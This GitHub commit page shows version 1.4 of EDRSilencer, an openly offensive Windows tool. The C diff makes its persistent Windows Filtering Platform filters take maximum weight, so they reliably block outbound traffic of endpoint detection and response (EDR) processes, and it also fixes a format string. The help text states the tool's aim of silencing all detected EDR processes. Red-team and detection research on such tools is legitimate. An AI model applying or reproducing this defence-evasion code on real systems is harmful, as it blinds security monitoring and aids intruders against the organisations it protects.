Skip to content

Commit

Permalink
Verion 1.4: bug fixes
Browse files Browse the repository at this point in the history
  • Loading branch information
netero1010 committed Nov 3, 2024
1 parent dde9400 commit 0e73a70
Show file tree
Hide file tree
Showing 2 changed files with 8 additions and 2 deletions.
8 changes: 7 additions & 1 deletion EDRSilencer.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -172,6 +172,9 @@ void BlockEdrProcessTraffic() {
filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;
UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
filter.weight.type = FWP_UINT64;
filter.weight.uint64 = &weightValue;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
Expand Down Expand Up @@ -277,6 +280,9 @@ void BlockProcessTraffic(char* fullPath) {
filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;
UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
filter.weight.type = FWP_UINT64;
filter.weight.uint64 = &weightValue;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
Expand Down Expand Up @@ -428,7 +434,7 @@ void UnblockWfpFilter(UINT64 filterId) {

void PrintHelp() {
printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
printf("Version: 1.3\n");
printf("Version: 1.4\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
printf(" EDRSilencer.exe blockedr\n\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
Expand Down
2 changes: 1 addition & 1 deletion utils.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -141,7 +141,7 @@ ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferS
return CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME;
}

swprintf(ntPathBuffer, bufferSize, L"%S%S", ntDrivePath, filePath + wcslen(driveName));
swprintf(ntPathBuffer, bufferSize, L"%ls%ls", ntDrivePath, filePath + wcslen(driveName));

for (size_t i = 0; ntPathBuffer[i] != L'\0'; ++i) {
ntPathBuffer[i] = towlower(ntPathBuffer[i]);
Expand Down

0 comments on commit 0e73a70

Please sign in to comment.